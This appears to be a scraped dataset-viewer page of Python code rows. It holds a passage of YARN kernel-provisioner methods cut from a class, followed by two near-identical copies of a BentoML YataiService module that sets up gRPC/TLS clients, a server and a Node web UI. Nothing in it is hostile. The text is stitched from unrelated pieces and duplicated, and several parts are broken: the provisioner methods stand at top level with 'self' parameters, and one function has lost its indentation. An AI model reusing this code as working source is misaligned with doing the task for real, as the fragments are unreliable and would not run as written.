    if self.local_proc:
        self.log.debug(f"YarnProvisioner.cleanup: Clearing possible defunct "
                       f"process, pid={self.local_proc.pid}...")
        # poll() returns the exit code once the child has exited (None while
        # running); a truthy (non-zero) code triggers the extra kill here.
        if self.local_proc.poll():
            self.local_proc.kill()
        self.local_proc.wait()
        self.local_proc = None
    # reset application id to force new query - handles kernel restarts/interrupts
    self.application_id = None
    # for cleanup, we should call the superclass last
    await super().cleanup(restart=restart)
async def confirm_remote_startup(self):
    """
    Confirms the yarn application is in a started state before returning.
    Should post-RUNNING states be unexpectedly encountered (FINISHED, KILLED, FAILED)
    then we must throw, otherwise the rest of the gateway will believe its talking
    to a valid kernel.
    Note: This is a complete override of the superclass method.
    """
    self.start_time = RemoteProvisionerBase.get_current_time()
    i = 0  # attempt counter, used only for debug logging
    ready_to_connect = False  # we're ready to connect when we have a connection file to use
    while not ready_to_connect:
        i += 1
        # Raises TimeoutError (via log_and_raise) once launch_timeout elapses.
        await self.handle_launch_timeout()
        if self._get_application_id(True):
            # Once we have an application ID, start monitoring state, obtain assigned host and get connection info
            app_state = self._get_application_state()
            if app_state in YarnProvisioner.final_states:
                error_message = f"KernelID: '{self.kernel_id}', ApplicationID: '{self.application_id}' " \
                                f"unexpectedly found in state '{app_state}' during kernel startup!"
                self.log_and_raise(RuntimeError(error_message))
            self.log.debug(f"{i}: State: '{app_state}', Host: '{self.assigned_host}', "
                           f"KernelID: '{self.kernel_id}', ApplicationID: '{self.application_id}'")
            if self.assigned_host != '':
                ready_to_connect = await self.receive_connection_info()
        else:
            self.detect_launch_failure()
async def handle_launch_timeout(self):
    """
    Checks to see if the kernel launch timeout has been exceeded while awaiting connection info.
    Note: This is a complete override of the superclass method.

    Sleeps one poll interval; on timeout, kills the app and raises TimeoutError
    (via log_and_raise) with a reason tailored to the app's current state.
    """
    await asyncio.sleep(poll_interval)
    time_interval = RemoteProvisionerBase.get_time_diff(self.start_time)
    if time_interval > self.launch_timeout:
        # Default reason: no application id was ever assigned.
        reason = f"Application ID is None. Failed to submit a new application to YARN within " \
                 f"{self.launch_timeout} seconds. Check server log for more information."
        if self._get_application_id(True):
            if self._query_app_state_by_id(self.application_id) != "RUNNING":
                reason = f"YARN resources unavailable after {time_interval} seconds for " \
                         f"app {self.application_id}, launch timeout: {self.launch_timeout}! " \
                         "Check YARN configuration."
            else:
                reason = f"App {self.application_id} is RUNNING, but waited too long " \
                         f"({self.launch_timeout} secs) to get connection file. " \
                         f"Check YARN logs for more information."
        await self.kill()
        timeout_message = f"KernelID: '{self.kernel_id}' launch timeout due to: {reason}"
        self.log_and_raise(TimeoutError(timeout_message))
async def get_provisioner_info(self) -> Dict:
    """Captures the base information necessary for kernel persistence relative to YARN clusters."""
    provisioner_info = await super().get_provisioner_info()
    # YARN-specific addition: the application id (may be None if not yet assigned).
    provisioner_info.update({'application_id': self.application_id})
    return provisioner_info
async def load_provisioner_info(self, provisioner_info: Dict) -> None:
    """Loads the base information necessary for kernel persistence relative to YARN clusters."""
    await super().load_provisioner_info(provisioner_info)
    # Counterpart of get_provisioner_info; raises KeyError if the key is absent.
    self.application_id = provisioner_info['application_id']
def _get_application_state(self) -> str:
    # Gets the current application state using the application_id already obtained. Once the assigned host
    # has been identified, 'amHostHttpAddress' is no longer accessed.
    # Falls back to last_known_state whenever the query yields nothing.
    app_state = self.last_known_state
    app = self._query_app_by_id(self.application_id)
    if app:
        if app.get('state'):
            app_state = app.get('state')
            self.last_known_state = app_state
        if self.assigned_host == '' and app.get('amHostHttpAddress'):
            # 'amHostHttpAddress' is "host:port"; keep only the host portion.
            self.assigned_host = app.get('amHostHttpAddress').split(':')[0]
            # Set the kernel manager ip to the actual host where the application landed.
            self.assigned_ip = socket.gethostbyname(self.assigned_host)
    return app_state
def _get_application_id(self, ignore_final_states: bool = False) -> str:
    # Return the kernel's YARN application ID if available, otherwise None. If we're obtaining application_id
    # from scratch, do not consider kernels in final states.
    if not self.application_id:
        app = self._query_app_by_name(self.kernel_id)
        state_condition = True
        if type(app) is dict:
            state = app.get('state')
            self.last_known_state = state
            if ignore_final_states:
                # Skip apps already FINISHED/KILLED/FAILED (e.g. a prior run
                # of the same kernel id).
                state_condition = state not in YarnProvisioner.final_states
            if len(app.get('id', '')) > 0 and state_condition:
                self.application_id = app['id']
                time_interval = RemoteProvisionerBase.get_time_diff(self.start_time)
                self.log.info(f"ApplicationID: '{app['id']}' assigned for KernelID: '{self.kernel_id}', "
                              f"state: {state}, {time_interval} seconds after starting.")
        if not self.application_id:
            self.log.debug(f"ApplicationID not yet assigned for KernelID: '{self.kernel_id}' - retrying...")
    return self.application_id
def _query_app_by_name(self, kernel_id: str) -> dict:
    """Retrieve application by using kernel_id as the unique app name.
    With the started_time_begin as a parameter to filter applications started earlier than the target one from YARN.
    When submit a new app, it may take a while for YARN to accept and run and generate the application ID.
    Note: if a kernel restarts with the same kernel id as app name, multiple applications will be returned.
    For now, the app/kernel with the top most application ID will be returned as the target app, assuming the app
    ID will be incremented automatically on the YARN side.
    :param kernel_id: as the unique app name for query
    :return: The JSON object of an application.
    """
    top_most_app_id = ''
    target_app = None
    try:
        response = self.resource_mgr.cluster_applications(started_time_begin=str(self.start_time))
    except socket.error as sock_err:
        # Distinguish a refused connection (RM down) from other socket errors.
        if sock_err.errno == errno.ECONNREFUSED:
            self.log.warning(f"YARN RM address: '{self.rm_addr}' refused the connection. "
                             f"Is the resource manager running?")
        else:
            self.log.warning(f"Query for kernel ID '{kernel_id}' failed with exception: "
                             f"{type(sock_err)} - '{sock_err}'. Continuing...")
    except Exception as e:
        self.log.warning(f"Query for kernel ID '{kernel_id}' failed with exception: "
                         f"{type(e)} - '{e}'. Continuing...")
    else:
        data = response.data
        if type(data) is dict and type(data.get("apps")) is dict and 'app' in data.get("apps"):
            for app in data['apps']['app']:
                # NOTE(review): app ids are compared lexicographically as
                # strings; assumes YARN's fixed-width id format keeps this
                # ordering consistent with submission order — confirm.
                if app.get('name', '').find(kernel_id) >= 0 and app.get('id') > top_most_app_id:
                    target_app = app
                    top_most_app_id = app.get('id')
    return target_app
def _query_app_by_id(self, app_id: str) -> dict:
    """Retrieve an application by application ID.
    :param app_id
    :return: The JSON object of an application.
    """
    try:
        response = self.resource_mgr.cluster_application(application_id=app_id)
    except Exception as e:
        self.log.warning(f"Query for application ID '{app_id}' failed with exception: '{e}'. Continuing...")
        return None
    payload = response.data
    if type(payload) is dict and 'app' in payload:
        return payload['app']
    return None
def _query_app_state_by_id(self, app_id: str) -> str:
    """Return the state of an application. If a failure occurs, the last known state is returned.
    :param app_id:
    :return: application state (str)
    """
    state = self.last_known_state
    try:
        response = self.resource_mgr.cluster_application_state(application_id=app_id)
    except Exception as e:
        self.log.warning(f"Query for application '{app_id}' state failed with exception: '{e}'. "
                         f"Continuing with last known state = '{state}'...")
        return state
    # Successful query: refresh the cache and return the fresh state.
    state = response.data['state']
    self.last_known_state = state
    return state
def _kill_app_by_id(self, app_id: str) -> dict:
    """Kill an application. If the app's state is FINISHED or FAILED, it won't be changed to KILLED.
    :param app_id
    :return: The JSON response of killing the application.
    """
    try:
        return self.resource_mgr.cluster_application_kill(application_id=app_id)
    except Exception as e:
        self.log.warning(f"Termination of application '{app_id}' failed with exception: '{e}'. Continuing...")
        return {}
|
import atexit
import logging
import os
import subprocess
import time
from concurrent import futures
import certifi
import click
from bentoml import config
from bentoml.configuration import get_debug_mode
from bentoml.exceptions import BentoMLException
from bentoml.yatai.utils import ensure_node_available_or_raise, parse_grpc_url
def get_yatai_service(
    channel_address=None,
    access_token=None,
    db_url=None,
    repo_base_url=None,
    s3_endpoint_url=None,
    default_namespace=None,
):
    """Return a YataiService client.

    When a channel address is configured (argument or `yatai_service.url`
    config), returns a gRPC `YataiStub` connected to that remote service
    (with TLS when the scheme is grpcs/https); otherwise builds and returns
    a local in-process YataiService using the remaining arguments.
    """
    channel_address = channel_address or config('yatai_service').get('url')
    access_token = access_token or config('yatai_service').get('access_token')
    channel_address = channel_address.strip()
    if channel_address:
        # Lazily import grpcio for YataiSerivce gRPC related actions
        import grpc
        from bentoml.yatai.proto.yatai_service_pb2_grpc import YataiStub
        from bentoml.yatai.client.interceptor import header_client_interceptor

        if any([db_url, repo_base_url, s3_endpoint_url, default_namespace]):
            # BUG FIX: the concatenated fragments previously ran together as
            # "...default_namespacewill all be ignored." — added the missing space.
            logger.warning(
                "Using remote YataiService at `%s`, local YataiService configs "
                "including db_url, repo_base_url, s3_endpoint_url and default_namespace "
                "will all be ignored.",
                channel_address,
            )
        logger.debug("Connecting YataiService gRPC server at: %s", channel_address)
        scheme, addr = parse_grpc_url(channel_address)
        header_adder_interceptor = header_client_interceptor.header_adder_interceptor(
            'access_token', access_token
        )
        if scheme in ('grpcs', 'https'):
            tls_root_ca_cert = (
                config().get('yatai_service', 'tls_root_ca_cert')
                # Adding also prev. name to ensure that old configurations do not break.
                or config().get('yatai_service', 'client_certificate_file')
                or certifi.where()  # default: Mozilla ca cert
            )
            tls_client_key = config().get('yatai_service', 'tls_client_key') or None
            tls_client_cert = config().get('yatai_service', 'tls_client_cert') or None
            with open(tls_root_ca_cert, 'rb') as fb:
                ca_cert = fb.read()
            # Optional mutual-TLS material: read file contents when configured.
            if tls_client_key:
                with open(tls_client_key, 'rb') as fb:
                    tls_client_key = fb.read()
            if tls_client_cert:
                with open(tls_client_cert, 'rb') as fb:
                    tls_client_cert = fb.read()
            credentials = grpc.ssl_channel_credentials(
                ca_cert, tls_client_key, tls_client_cert
            )
            channel = grpc.intercept_channel(
                grpc.secure_channel(addr, credentials), header_adder_interceptor
            )
        else:
            channel = grpc.intercept_channel(
                grpc.insecure_channel(addr), header_adder_interceptor
            )
        return YataiStub(channel)
    else:
        from bentoml.yatai.yatai_service_impl import get_yatai_service_impl

        LocalYataiService = get_yatai_service_impl()
        logger.debug("Creating local YataiService instance")
        return LocalYataiService(
            db_url=db_url,
            repo_base_url=repo_base_url,
            s3_endpoint_url=s3_endpoint_url,
            default_namespace=default_namespace,
        )
def start_yatai_service_grpc_server(
    db_url, repo_base_url, grpc_port, ui_port, with_ui, s3_endpoint_url, base_url
):
    """Start the YataiService gRPC server (and, optionally, the web UI subprocess)
    on the given ports, print usage instructions, and block until Ctrl+C.
    """
    # Lazily import grpcio for YataiSerivce gRPC related actions
    import grpc
    from bentoml.yatai.yatai_service_impl import get_yatai_service_impl
    from bentoml.yatai.proto.yatai_service_pb2_grpc import add_YataiServicer_to_server
    from bentoml.yatai.proto.yatai_service_pb2_grpc import YataiServicer

    YataiServicerImpl = get_yatai_service_impl(YataiServicer)
    yatai_service = YataiServicerImpl(
        db_url=db_url, repo_base_url=repo_base_url, s3_endpoint_url=s3_endpoint_url,
    )
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
    add_YataiServicer_to_server(yatai_service, server)
    debug_mode = get_debug_mode()
    if debug_mode:
        try:
            logger.debug('Enabling gRPC server reflection for debugging')
            from grpc_reflection.v1alpha import reflection
            from bentoml.yatai.proto import yatai_service_pb2

            SERVICE_NAMES = (
                yatai_service_pb2.DESCRIPTOR.services_by_name['Yatai'].full_name,
                reflection.SERVICE_NAME,
            )
            reflection.enable_server_reflection(SERVICE_NAMES, server)
        except ImportError:
            logger.debug(
                'Failed to enable gRPC server reflection, missing required package: '
                '"pip install grpcio-reflection"'
            )
    server.add_insecure_port(f'[::]:{grpc_port}')
    server.start()
    if with_ui:
        web_ui_log_path = os.path.join(
            config("logging").get("BASE_LOG_DIR"),
            config('logging').get("yatai_web_server_log_filename"),
        )
        ensure_node_available_or_raise()
        yatai_grpc_server_address = f'localhost:{grpc_port}'
        async_start_yatai_service_web_ui(
            yatai_grpc_server_address, ui_port, web_ui_log_path, debug_mode, base_url
        )
    # We don't import _echo function from click_utils because of circular dep
    # BUG FIX: two f-string expressions below previously reused single quotes
    # inside single-quoted f-strings — a SyntaxError on Python < 3.12 (quote
    # reuse was only permitted by PEP 701). Inner strings now use double quotes.
    click.echo(
        f'* Starting BentoML YataiService gRPC Server\n'
        f'* Debug mode: { "on" if debug_mode else "off"}\n'
        f'''* Web UI: {f"running on http://127.0.0.1:{ui_port}/{base_url}"
        if (with_ui and base_url!=".")
        else f"running on http://127.0.0.1:{ui_port}" if with_ui else "off"}\n'''
        f'* Running on 127.0.0.1:{grpc_port} (Press CTRL+C to quit)\n'
        f'* Help and instructions: '
        f'https://docs.bentoml.org/en/latest/guides/yatai_service.html\n'
        f'{f"* Web server log can be found here: {web_ui_log_path}" if with_ui else ""}'
        f'\n-----\n'
        f'* Usage in Python:\n'
        f'* bento_svc.save(yatai_url="127.0.0.1:{grpc_port}")\n'
        f'* bentoml.yatai.client.get_yatai_client("127.0.0.1:{grpc_port}").repository.'
        f'list()\n'
        f'* Usage in CLI:\n'
        f'* bentoml list --yatai-url=127.0.0.1:{grpc_port}\n'
        f'* bentoml containerize IrisClassifier:latest --yatai-url=127.0.0.1:'
        f'{grpc_port}\n'
        f'* bentoml push IrisClassifier:20200918001645_CD2886 --yatai-url=127.0.0.1:'
        f'{grpc_port}\n'
        f'* bentoml pull IrisClassifier:20200918001645_CD2886 --yatai-url=127.0.0.1:'
        f'{grpc_port}\n'
        f'* bentoml retrieve IrisClassifier:20200918001645_CD2886 '
        f'--yatai-url=127.0.0.1:{grpc_port} --target_dir="/tmp/foo/bar"\n'
        f'* bentoml delete IrisClassifier:20200918001645_CD2886 '
        f'--yatai-url=127.0.0.1:{grpc_port}\n'
        # TODO: simplify the example usage here once related documentation is ready
    )
    try:
        # Keep the main thread alive; grpc serves on worker threads.
        while True:
            time.sleep(_ONE_DAY_IN_SECONDS)
    except KeyboardInterrupt:
        logger.info("Terminating YataiService gRPC server..")
        server.stop(grace=None)
def _is_web_server_debug_tools_available(root_dir):
return (
os.path.exists(os.path.join(root_dir, 'node_modules/.bin', 'concurrently'))
and os.path.exists(os.path.join(root_dir, 'node_modules/.bin', 'ts-node'))
and os.path.exists(os.path.join(root_dir, 'node_modules/.bin', 'nodemon'))
)
def async_start_yatai_service_web_ui(
    yatai_server_address, ui_port, base_log_path, debug_mode, web_prefix_path
):
    """Launch the Node.js Yatai web UI as a background subprocess.

    In debug mode runs `npm run dev` when the TypeScript sources and dev tools
    are present, otherwise runs the prebuilt `dist/bundle.js`. Raises
    BentoMLException if the production bundle is missing or the process dies
    immediately after launch.
    """
    if ui_port is not None:
        # The CLI may pass an int; the node command line needs a string.
        ui_port = ui_port if isinstance(ui_port, str) else str(ui_port)
    web_ui_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'web'))
    web_prefix_path = web_prefix_path.strip("/")
    if debug_mode:
        # Only when src/index.ts exists, we will run dev (nodemon)
        if os.path.exists(
            os.path.join(web_ui_dir, 'src/index.ts')
        ) and _is_web_server_debug_tools_available(web_ui_dir):
            web_ui_command = [
                'npm',
                'run',
                'dev',
                '--',
                yatai_server_address,
                ui_port,
                base_log_path,
                web_prefix_path,
            ]
        else:
            web_ui_command = [
                'node',
                'dist/bundle.js',
                yatai_server_address,
                ui_port,
                base_log_path,
                web_prefix_path,
            ]
    else:
        if not os.path.exists(os.path.join(web_ui_dir, 'dist', 'bundle.js')):
            raise BentoMLException(
                'Yatai web client built is missing. '
                'Please run `npm run build` in the bentoml/yatai/web directory '
                'and then try again'
            )
        web_ui_command = [
            'node',
            'dist/bundle.js',
            yatai_server_address,
            ui_port,
            base_log_path,
            web_prefix_path,
        ]
    web_proc = subprocess.Popen(
        web_ui_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=web_ui_dir
    )
    # poll() is None while the child runs; an immediate exit means startup failed.
    is_web_proc_running = web_proc.poll() is None
    if not is_web_proc_running:
        web_proc_output = web_proc.stdout.read().decode('utf-8')
        logger.error(f'return code: {web_proc.returncode} {web_proc_output}')
        raise BentoMLException('Yatai web ui did not start properly')
    # Ensure the UI subprocess is terminated when this process exits.
    atexit.register(web_proc.terminate)
# Sleep quantum for the gRPC serve loop (interrupted by KeyboardInterrupt).
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
# Module-level logger used by the functions above.
logger = logging.getLogger(__name__)
| import atexit
import logging
import os
import subprocess
import time
from concurrent import futures
import certifi
import click
from bentoml import config
from bentoml.configuration import get_debug_mode
from bentoml.exceptions import BentoMLException
from bentoml.yatai.utils import ensure_node_available_or_raise, parse_grpc_url
def get_yatai_service(
    channel_address=None,
    access_token=None,
    db_url=None,
    repo_base_url=None,
    s3_endpoint_url=None,
    default_namespace=None,
):
    """Return a YataiService client.

    When a channel address is configured (argument or `yatai_service.url`
    config), returns a gRPC `YataiStub` connected to that remote service
    (with TLS when the scheme is grpcs/https); otherwise builds and returns
    a local in-process YataiService using the remaining arguments.
    """
    channel_address = channel_address or config('yatai_service').get('url')
    access_token = access_token or config('yatai_service').get('access_token')
    channel_address = channel_address.strip()
    if channel_address:
        # Lazily import grpcio for YataiSerivce gRPC related actions
        import grpc
        from bentoml.yatai.proto.yatai_service_pb2_grpc import YataiStub
        from bentoml.yatai.client.interceptor import header_client_interceptor

        if any([db_url, repo_base_url, s3_endpoint_url, default_namespace]):
            # BUG FIX: the concatenated fragments previously ran together as
            # "...default_namespacewill all be ignored." — added the missing space.
            logger.warning(
                "Using remote YataiService at `%s`, local YataiService configs "
                "including db_url, repo_base_url, s3_endpoint_url and default_namespace "
                "will all be ignored.",
                channel_address,
            )
        logger.debug("Connecting YataiService gRPC server at: %s", channel_address)
        scheme, addr = parse_grpc_url(channel_address)
        header_adder_interceptor = header_client_interceptor.header_adder_interceptor(
            'access_token', access_token
        )
        if scheme in ('grpcs', 'https'):
            tls_root_ca_cert = (
                config().get('yatai_service', 'tls_root_ca_cert')
                # Adding also prev. name to ensure that old configurations do not break.
                or config().get('yatai_service', 'client_certificate_file')
                or certifi.where()  # default: Mozilla ca cert
            )
            tls_client_key = config().get('yatai_service', 'tls_client_key') or None
            tls_client_cert = config().get('yatai_service', 'tls_client_cert') or None
            with open(tls_root_ca_cert, 'rb') as fb:
                ca_cert = fb.read()
            # Optional mutual-TLS material: read file contents when configured.
            if tls_client_key:
                with open(tls_client_key, 'rb') as fb:
                    tls_client_key = fb.read()
            if tls_client_cert:
                with open(tls_client_cert, 'rb') as fb:
                    tls_client_cert = fb.read()
            credentials = grpc.ssl_channel_credentials(
                ca_cert, tls_client_key, tls_client_cert
            )
            channel = grpc.intercept_channel(
                grpc.secure_channel(addr, credentials), header_adder_interceptor
            )
        else:
            channel = grpc.intercept_channel(
                grpc.insecure_channel(addr), header_adder_interceptor
            )
        return YataiStub(channel)
    else:
        from bentoml.yatai.yatai_service_impl import get_yatai_service_impl

        LocalYataiService = get_yatai_service_impl()
        logger.debug("Creating local YataiService instance")
        return LocalYataiService(
            db_url=db_url,
            repo_base_url=repo_base_url,
            s3_endpoint_url=s3_endpoint_url,
            default_namespace=default_namespace,
        )
def start_yatai_service_grpc_server(
    db_url, repo_base_url, grpc_port, ui_port, with_ui, s3_endpoint_url, base_url
):
    """Start the YataiService gRPC server (and, optionally, the web UI subprocess)
    on the given ports, print usage instructions, and block until Ctrl+C.
    """
    # Lazily import grpcio for YataiSerivce gRPC related actions
    import grpc
    from bentoml.yatai.yatai_service_impl import get_yatai_service_impl
    from bentoml.yatai.proto.yatai_service_pb2_grpc import add_YataiServicer_to_server
    from bentoml.yatai.proto.yatai_service_pb2_grpc import YataiServicer

    YataiServicerImpl = get_yatai_service_impl(YataiServicer)
    yatai_service = YataiServicerImpl(
        db_url=db_url, repo_base_url=repo_base_url, s3_endpoint_url=s3_endpoint_url,
    )
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
    add_YataiServicer_to_server(yatai_service, server)
    debug_mode = get_debug_mode()
    if debug_mode:
        try:
            logger.debug('Enabling gRPC server reflection for debugging')
            from grpc_reflection.v1alpha import reflection
            from bentoml.yatai.proto import yatai_service_pb2

            SERVICE_NAMES = (
                yatai_service_pb2.DESCRIPTOR.services_by_name['Yatai'].full_name,
                reflection.SERVICE_NAME,
            )
            reflection.enable_server_reflection(SERVICE_NAMES, server)
        except ImportError:
            # Reflection is a debug nicety only; keep serving without it.
            logger.debug(
                'Failed to enable gRPC server reflection, missing required package: '
                '"pip install grpcio-reflection"'
            )
    server.add_insecure_port(f'[::]:{grpc_port}')
    server.start()
    if with_ui:
        web_ui_log_path = os.path.join(
            config("logging").get("BASE_LOG_DIR"),
            config('logging').get("yatai_web_server_log_filename"),
        )
        ensure_node_available_or_raise()
        yatai_grpc_server_address = f'localhost:{grpc_port}'
        async_start_yatai_service_web_ui(
            yatai_grpc_server_address, ui_port, web_ui_log_path, debug_mode, base_url
        )
    # We don't import _echo function from click_utils because of circular dep
    click.echo(
        f'* Starting BentoML YataiService gRPC Server\n'
        f'* Debug mode: { "on" if debug_mode else "off"}\n'
        f'''* Web UI: {f"running on http://127.0.0.1:{ui_port}/{base_url}"
        if (with_ui and base_url!=".")
        else f"running on http://127.0.0.1:{ui_port}" if with_ui else "off"}\n'''
        f'* Running on 127.0.0.1:{grpc_port} (Press CTRL+C to quit)\n'
        f'* Help and instructions: '
        f'https://docs.bentoml.org/en/latest/guides/yatai_service.html\n'
        f'{f"* Web server log can be found here: {web_ui_log_path}" if with_ui else ""}'
        f'\n-----\n'
        f'* Usage in Python:\n'
        f'* bento_svc.save(yatai_url="127.0.0.1:{grpc_port}")\n'
        f'* bentoml.yatai.client.get_yatai_client("127.0.0.1:{grpc_port}").repository.'
        f'list()\n'
        f'* Usage in CLI:\n'
        f'* bentoml list --yatai-url=127.0.0.1:{grpc_port}\n'
        f'* bentoml containerize IrisClassifier:latest --yatai-url=127.0.0.1:'
        f'{grpc_port}\n'
        f'* bentoml push IrisClassifier:20200918001645_CD2886 --yatai-url=127.0.0.1:'
        f'{grpc_port}\n'
        f'* bentoml pull IrisClassifier:20200918001645_CD2886 --yatai-url=127.0.0.1:'
        f'{grpc_port}\n'
        f'* bentoml retrieve IrisClassifier:20200918001645_CD2886 '
        f'--yatai-url=127.0.0.1:{grpc_port} --target_dir="/tmp/foo/bar"\n'
        f'* bentoml delete IrisClassifier:20200918001645_CD2886 '
        f'--yatai-url=127.0.0.1:{grpc_port}\n'
        # TODO: simplify the example usage here once related documentation is ready
    )
    try:
        # Keep the main thread alive; grpc serves on worker threads.
        while True:
            time.sleep(_ONE_DAY_IN_SECONDS)
    except KeyboardInterrupt:
        logger.info("Terminating YataiService gRPC server..")
        server.stop(grace=None)
def _is_web_server_debug_tools_available(root_dir):
return (
os.path.exists(os.path.join(root_dir, 'node_modules/.bin', 'concurrently'))
and os.path.exists(os.path.join(root_dir, 'node_modules/.bin', 'ts-node'))
and os.path.exists(os.path.join(root_dir, 'node_modules/.bin', 'nodemon'))
)
def async_start_yatai_service_web_ui(
    yatai_server_address, ui_port, base_log_path, debug_mode, web_prefix_path
):
    """Launch the Node.js Yatai web UI as a background subprocess.

    In debug mode runs `npm run dev` when the TypeScript sources and dev tools
    are present, otherwise runs the prebuilt `dist/bundle.js`. Raises
    BentoMLException if the production bundle is missing or the process dies
    immediately after launch.
    """
    if ui_port is not None:
        # The CLI may pass an int; the node command line needs a string.
        ui_port = ui_port if isinstance(ui_port, str) else str(ui_port)
    web_ui_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'web'))
    web_prefix_path = web_prefix_path.strip("/")
    if debug_mode:
        # Only when src/index.ts exists, we will run dev (nodemon)
        if os.path.exists(
            os.path.join(web_ui_dir, 'src/index.ts')
        ) and _is_web_server_debug_tools_available(web_ui_dir):
            web_ui_command = [
                'npm',
                'run',
                'dev',
                '--',
                yatai_server_address,
                ui_port,
                base_log_path,
                web_prefix_path,
            ]
        else:
            web_ui_command = [
                'node',
                'dist/bundle.js',
                yatai_server_address,
                ui_port,
                base_log_path,
                web_prefix_path,
            ]
    else:
        if not os.path.exists(os.path.join(web_ui_dir, 'dist', 'bundle.js')):
            raise BentoMLException(
                'Yatai web client built is missing. '
                'Please run `npm run build` in the bentoml/yatai/web directory '
                'and then try again'
            )
        web_ui_command = [
            'node',
            'dist/bundle.js',
            yatai_server_address,
            ui_port,
            base_log_path,
            web_prefix_path,
        ]
    web_proc = subprocess.Popen(
        web_ui_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=web_ui_dir
    )
    # poll() is None while the child runs; an immediate exit means startup failed.
    is_web_proc_running = web_proc.poll() is None
    if not is_web_proc_running:
        web_proc_output = web_proc.stdout.read().decode('utf-8')
        logger.error(f'return code: {web_proc.returncode} {web_proc_output}')
        raise BentoMLException('Yatai web ui did not start properly')
    # Ensure the UI subprocess is terminated when this process exits.
    atexit.register(web_proc.terminate)
# Sleep quantum for the gRPC serve loop (interrupted by KeyboardInterrupt).
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
# Module-level logger used by the functions above.
logger = logging.getLogger(__name__)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.